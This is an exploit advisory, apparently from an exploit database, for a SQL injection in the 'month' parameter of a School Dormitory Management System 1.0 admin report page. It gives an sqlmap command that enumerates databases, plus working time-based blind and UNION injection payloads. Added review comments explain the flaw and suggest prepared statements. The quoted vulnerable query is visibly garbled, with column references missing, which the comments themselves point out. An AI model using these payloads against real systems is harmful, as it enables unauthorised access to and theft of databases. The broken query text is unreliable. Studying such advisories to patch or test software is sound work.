# Exploit Title: School Dormitory Management System - 'month' SQL Injection  
# Date: 08/05/2022  
# Exploit Author: Saud Alenazi  
# Vendor Homepage:  
# Software Link:  
# Version: 1.0  
# Tested on: XAMPP, Linux  
# Vulnerable Code  
Line 59 of "/dms/admin/reports/daily_collection_report.php" interpolates $month directly into the SQL string instead of binding it as a parameter:  
// Vulnerable: $month is placed inside the quoted literal by string interpolation, so a
// single quote in the value ends the literal and the remainder is parsed as SQL (both
// payloads under "Output" begin with 1'). Fix: pass the value as a bound parameter of a
// prepared statement and reject input that is not a well-formed month before querying.
// NOTE(review): several column references in this quoted query (before "as dorm", after
// "p.account_id =", and in the other join conditions) appear to have been lost when the
// page was extracted; compare with the original file before relying on the exact text.
// NOTE(review): the page does not say whether /dms/admin/ requires a logged-in session;
// confirm this when rating exposure.
$qry = $conn->query("SELECT p.*, a.code, s.code as student_code, concat(s.firstname, ' ', coalesce(concat(s.middlename,' '), ''), s.lastname) as `student`, as dorm, as `room` from payment_list p inner join account_list a on p.account_id = inner join student_list s on a.student_id = inner join room_list r on a.room_id = inner join dorm_list d on r.dorm_id = where (p.month_of) = '{$month}' order by student asc ");  
# Sqlmap command:  
sqlmap -u "http://localhost/dms/admin/?month=1&page=reports/daily_collection_report" -p month --level=5 --risk=3 --dbs --random-agent --eta  
# Output:  
Parameter: month (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: month=1' AND (SELECT 3271 FROM (SELECT(SLEEP(5)))duQT) AND 'NgBP'='NgBP&page=reports/daily_collection_report  
Type: UNION query  
Title: Generic UNION query (NULL) - 11 columns  
Payload: month=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626b6a71,0x485362486f7266597a444d417754744873427366706c4a4f706b7949467a6a61505468424c476753,0x716b6a7171),NULL,NULL,NULL,NULL-- -&page=reports/daily_collection_report